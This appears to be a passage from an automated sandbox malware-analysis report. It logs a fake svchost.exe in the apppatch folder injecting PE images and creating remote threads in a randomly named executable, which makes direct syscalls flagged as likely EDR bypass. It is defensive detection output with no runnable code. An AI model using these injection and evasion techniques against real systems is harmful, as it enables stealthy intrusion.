Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe EIP: 2C01360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2AF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 6E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F11360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 12D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 781360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: CA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2981360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2411360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1031360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 871360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E61360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1011360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E71360Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtUnmapViewOfSection: Direct from: 0x77462D3C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetTimerEx: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtEnumerateKey: Direct from: 0x77462DBC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtOpenKeyEx: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetInformationFile: Direct from: 0x77462D0C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtEnumerateValueKey: Direct from: 0x77462BAC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtSetInformationThread: Direct from: 0x77462ECC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtTerminateThread: Direct from: 0x77462FCC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeNtAllocateVirtualMemory: Direct from: 0x77462B9C
Injects a PE file into a foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1202000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1322000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 3072000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2A52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 26B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C02000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 782000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2982000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2412000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1032000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 872000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1042000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2532000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 842000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1222000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 812000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 852000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: DA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1482000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1502000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: C52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1152000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 14E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 10D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1132000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 862000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1502000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 852000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: D22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1102000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: A42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1422000 value starts with: 4D5AJump to behavior
